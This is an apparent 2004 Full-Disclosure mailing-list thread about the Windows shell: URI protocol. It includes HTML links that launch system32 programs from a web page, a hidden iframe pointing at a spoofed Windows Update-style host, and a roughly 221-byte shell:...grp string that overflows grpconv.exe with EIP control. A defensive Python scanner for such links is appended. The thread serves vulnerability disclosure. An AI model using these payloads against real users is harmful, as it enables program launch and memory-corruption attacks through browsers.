This is dangerous. Based on the file extension of the shell protocol, different applications may be launched. For example: shell:.its will launch Internet Explorer and shell:.mp3 will launch Winamp.

The trick is to find an application that will overflow when given a very long parameter. A quick check showed that a buffer overflow occurred within MSProgramGroup (WINDOWS\System32\grpconv.exe) after around 230 bytes with the following URL:

shell:[x*221].grp

EIP can be controlled, but exploitation is a bit tricky since the parameter is stored as unicode. Also Winamp contains a BO (no unicode here).

Tested environment: Windows XP pro + FireFox 0.9.1

/Andreas Sandblad

On Wed, 7 Jul 2004, Perrymon, Josh L. wrote:

> -----snip------
> center><br><br><img src="nocigar.gif"></center>
> <center>
> <a href="shell:windows\snakeoil.txt">who goes there</a></center> <iframe
> src="http://windowsupdate.microsoft.com%2F.http-
> equiv.dyndns.org/~http-equiv/b*llsh*t.html" style="display:none">
> [customise as you see fit]
> <http://www.malware.com/stockpump.html>
> ------end----------
>
> The code above has interest to me.
> Even in Mozilla the commands below will work.
>
> <a href=shell:windows\\system32\\calc.exe>1</a>
> <a href=shell:windows\system32\calc.exe>2</a>
> <a href=shell:windows\system32\winver.exe>4</a>
>
> Just save them to an .html file and run it.
> The first one with the double quotes was from bugtraq:
> Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash
> <http://seclists.org/lists/bugtraq/2004/Mar/0188.html>
>
> The links below that will run calc as well as winver.
> It seems it calls windows as a virtual dir because c:\winxp is what I have.
> I have been playing around to see if cmd.exe will work with it but without
> luck.
>
> This is what is in the registry.
> HKEY_CLASSES_ROOT\Shell
>
> Look in the registry key above. You will find the shell object calls Windows
> Explorer with a particular set of arguments.
> %SystemRoot%\Explorer.exe /e,/idlist,%I,%L
>
> So this is tied to explorer.exe. This is something involved with the
> underlying functions of windows
> and not IE so to speak because it works in Mozilla or from the run line.
>
> I'm trying to find out more about the shell: command because I can put a
> link on a site that seems to run anything
> in system32 dir. I'd like to see if you can pass parameters to it.
>
> Anyone give me more info on the shell:windows command?
>
> JP
>
>
> Joshua Perrymon
> Sr. Network Security Consultant
> PGP Fingerprint
> 51B8 01AC E58B 9BFE D57D 8EF6 C0B2 DECF EC20 6021
>
> **********CONFIDENTIALITY NOTICE**********
> The information contained in this e-mail may be proprietary and/or
> privileged and is intended for the sole use of the individual or
> organization named above. If you are not the intended recipient or an
> authorized representative of the intended recipient, any review, copying
> or distribution of this e-mail and its attachments, if any, is prohibited.
> If you have received this e-mail in error, please notify the sender
> immediately by return e-mail and delete this message from your system.
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

--
    _     _
 o' \,=./ `o
    (o o)
---ooO--(_)--Ooo---
Andreas Sandblad
Sweden

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
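For a defender who wants to catch pages carrying the kind of shell: links discussed in this thread (a content filter or mail-gateway check), here is an added example, not code from either poster: it walks an HTML document, reports every href/src using the shell: scheme together with the extension that selects the handler, and flags parameters long enough to be an overflow attempt. The 200-byte threshold and the sample HTML are constructed for the example.

```python
from html.parser import HTMLParser

# Constructed threshold: the post reports grpconv.exe overflowing at ~230
# bytes, so anything this long is worth flagging, not just logging.
MAX_SHELL_PATH = 200


class ShellLinkScanner(HTMLParser):
    """Collect every href/src attribute whose value uses the shell: scheme."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name not in ("href", "src") or not value:
                continue
            v = value.strip()
            if not v.lower().startswith("shell:"):
                continue
            path = v[len("shell:"):]
            # The extension decides which application Explorer launches.
            ext = path.rsplit(".", 1)[1].lower() if "." in path else ""
            self.findings.append({
                "tag": tag,
                "path": path,
                "ext": ext,
                "length": len(path),
                "overlong": len(path) > MAX_SHELL_PATH,
            })


def scan_html(html):
    """Return a list of findings, one per shell: link, in document order."""
    scanner = ShellLinkScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample input mirroring the links quoted in the thread.
LONG_GRP = "shell:" + "x" * 221 + ".grp"
SAMPLE_HTML = "\n".join([
    r'<a href="shell:windows\snakeoil.txt">who goes there</a>',
    r'<a href=shell:windows\system32\calc.exe>2</a>',
    f'<a href="{LONG_GRP}">group file</a>',
    '<a href="http://example.invalid/">unrelated link</a>',
])

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f"{f['tag']}: .{f['ext']} len={f['length']} overlong={f['overlong']}")
```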
